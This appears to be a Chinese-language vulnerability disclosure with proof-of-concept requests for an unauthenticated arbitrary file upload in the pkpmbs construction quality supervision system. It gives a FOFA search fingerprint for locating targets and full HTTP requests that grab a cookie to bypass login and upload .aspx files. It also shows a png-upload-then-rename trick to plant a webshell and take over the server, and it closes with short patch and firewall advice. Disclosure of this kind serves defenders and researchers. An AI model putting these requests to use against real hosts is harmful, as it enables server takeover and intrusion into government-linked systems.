0x01 产品简介
pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的,B/S架构的检测信息监管系统。
0x02 漏洞概述
pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文件上传漏洞,未经身份认证的攻击者可以利用漏洞上传恶意后门文件,从而获取服务器权限。
0x03 影响范围
标准版 <= 2.2023.0328.172228
0x04 复现环境
FOFA:icon_hash="2001627082"
0x05 漏洞复现
PoC-1
GET /Login.cshtml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip获取有效cookie,绕过权限认证
携带cookie,上传文件
POST /Applications/Forms/SearchSetting/FileUpOrDown.ashx?operation=Fileupload&extName=.aspx&&searchConfigName=上传的文件名 HTTP/1.1
Host: your-ip
Cookie: your-cookie
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Length: 185------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: image/pngtest
------WebKitFormBoundarybqACRhAMBHmQQAUP--
回显了上传路径,验证
Getshell
PoC-2
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/pngtest
------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="target"/Applications/SkillDevelopAndEHS/
------WebKitFormBoundarybqACRhAMBHmQQAUP--
PS:直接是不允许上传aspx文件,需要先上传txt、png等类型文件然后,转换文件格式
上传png文件
转换文件类型
GET /Applications/SkillDevelopAndEHS/fileMove.cshtml?filePath=上传的文件名&factFilePath=1.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
根据上面回显的路径验证
上传马子也是同样的姿势
0x06 修复建议
官方已修复该漏洞,请用户联系厂商升级至安全版本:http://www.hunanjianyan.com/
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。
